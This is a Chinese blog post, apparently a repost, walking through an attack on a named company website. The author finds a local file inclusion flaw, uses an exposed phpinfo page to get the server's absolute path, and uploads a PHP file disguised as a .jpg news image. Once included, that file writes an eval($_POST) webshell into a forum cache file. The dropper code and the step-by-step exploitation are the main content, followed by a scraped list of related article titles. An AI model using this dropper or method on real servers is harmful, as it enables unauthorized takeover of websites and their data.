文件包含漏洞对公司测试
主站是:www.xxxx.biz
环境:linux php nginx,伪静态的。
主站基本是没希望,不过xss很多,懒得去利用。
有公司有一个新新业务,所以开发部门建立了一个新的网站,所以我也就..........开始看了下dz 7.5的,自己修改了一些东西,尝试了公开的0DAY没戏,各种尝试无果。
最后丢到wvs里面一扫,一会就出来了一个本地包含漏洞,详细继续。
根据WVS扫描结果,漏洞发生在以下页面:
&id=17
这是一个很明显的本地文件包含漏洞
但是这个漏洞使用相对路径来进行包含是不成功的,要使用绝对路径,在以下文件发现phpinfo信息
http://www.cntuike.net/info.php
发现网站绝对路径为
/data0/htdocs/www.dxg.com/view/
于是用WVS的HTTPEDITOR进行访问
此时你已经发现info.php已经被成功包含并执行了
接下来要构造你自己的webshell,通常情况下就是通过上传。在网站上发现了注册会员服务,注册一个账号之后,在用户中心的企业新闻里面新增一个新闻,然后上传一个内容是:
<?php
$fp = @fopen("/data0/htdocs/www.dxg.com/view/bbs/forumdata/cache/cache_1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[chen]);'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>
上传成功后可以看到是一个相对路径
/uploads/contentImg/news/201204/10/133404553855857.jpg
将两者合并起来
/data0/htdocs/www.dxg.com/view/uploads/contentImg/news/201204/10/133404553855857.jpg
于是再用WVS访问
成功之后直接访问
http://www.cntuike.net/bbs/forumdata/cache/cache_1.php
-
3212323.jpg (12.07 KB)
转载于:https://www.cnblogs.com/mujj/articles/2781900.html
文件包含漏洞对公司测试相关推荐
- 【文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
目录 1 文件包含漏洞 1.1 文件包含漏洞概述 1.2 文件包含漏洞的形成原因/条件 1.3 危害 2 文件包含漏洞简单测试实例 2.1 测试环境 2.2 实例一:本地文件包含 2.3 实例二:远程 ...
- 文件包含漏洞——DVWA练习
前言:在学习文件上传时,制作的图片马需要我们手动去解析,而解析的方法就算用到了文件包含漏洞,所以这次就来学习一下文件包含漏洞. 文件包含漏洞简介 (一)文件包含可以分为本地文件包含和远程文件包含两种. ...
- 文件包含漏洞(完整版)
*本文作者:山东安云,转载来自FreeBuf.COM 0×01 文件包含简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间. ...
- 文件包含漏洞全面详解
文件包含漏洞总结 一.什么是文件包含漏洞 二.本地文件包含漏洞(LFI) 三.LFI漏洞利用技巧 1.配合文件上传使用 2.包含Apache日志文件 3.包含SESSION文件 4.包含临时文件 四. ...
- 文件包含漏洞实例操作
文件包含漏洞实例操作 参考文章 本地文件包含漏洞 无限制本地文件包含漏洞 session文件包含漏洞 有限制本地文件包含漏洞 %00截断 路径长度截断 点号截断 远程文件包含漏洞 无限制远程文件包含漏 ...
- 文件包含原理及本地文件包含漏洞演示(本地文件,远程包含文件的测试)
一.文件包含漏洞概述 1.定义:文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序.当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行 ...
- 89.网络安全渗透测试—[常规漏洞挖掘与利用篇5]—[文件包含漏洞详解实战示例]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.文件包含漏洞详解 1.文件包含漏洞相关概念 2.PHP文件包含漏洞相关概念 3.PHP文件包含漏洞利用:`构 ...
- Web安全:文件包含漏洞测试(防止 黑客利用此漏洞.)
Web安全:文件包含漏洞测试. 文件包含的漏洞是 程序员在开发网站的时候,为了方便自己开发构架,使用了一些包含的函数(比如:php开发语言,include() , include_once() , ...
- 渗透测试练习No.18 利用phpinfo+LFI(文件包含漏洞)打进主机
本文首发于微信公众号"伏波路上学安全",喜欢的小伙伴们请关注公众号持续获取新的文章. 声明:文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果 ...
最新文章
- 作为一个java程序员,常用的linux命令(越攒越多)
- Oracle导入csv数据字符集,用SQLLDR把.CSV文件导入到数据库时,出现无法定位字符集句柄以用于字符集标识(0)...
- 设计模式中的开闭原则
- 《Adobe Photoshop CC经典教程(彩色版)》—第4课4.7节添加调整图层
- 设计模式之中介者模式(mediator模式)
- 如何用ELK搭建TB级的日志监控系统?
- Kotlin协程简介(一)
- PAT-A Sign In and Sign Out
- input默认提示取消
- 支持Android的Qt5预览
- AD模式下出现NetLogon 5781错误的对策
- 计算机算法专业英语,计算机算法相关术语的英语词汇
- Matlab读取Excel各个子表的数据进行拟合
- 出差中,推荐几个百度,腾讯,抖音大佬的公众号
- 58同城2014校园招聘软件测试笔试题
- (6)EndNote——文献管理软件通用操作大全
- c++nullptr(空指针常量)、constexpr(常量表达式)
- 电脑中常用的“扇区”、“簇”、“块”、“页”等概念
- 用AltiumDesigner定义板子形状及开槽
- 电子科技大学信息与通信工程学院858考研上岸经验分享(一)
热门文章
- vue 动态的修改样式
- IDEA上传本地项目到SVN
- Android开发笔记(一百七十七)借助FileProvider安装应用
- 如何在Linux操作系统定时重启Tomcat服务?
- Spark cluster 部署
- 转]最长递增子序列问题的求解
- Zookeeper概念学习系列之zookeeper是什么?
- Node.js使用supervisor遭遇‘supervisor’不是内部或外部命令,如果解决?
- 使用C#客户端访问FTP服务的一个解决方案
- mysql odbc 驱动_mysql odbc驱动 mysql odbc connector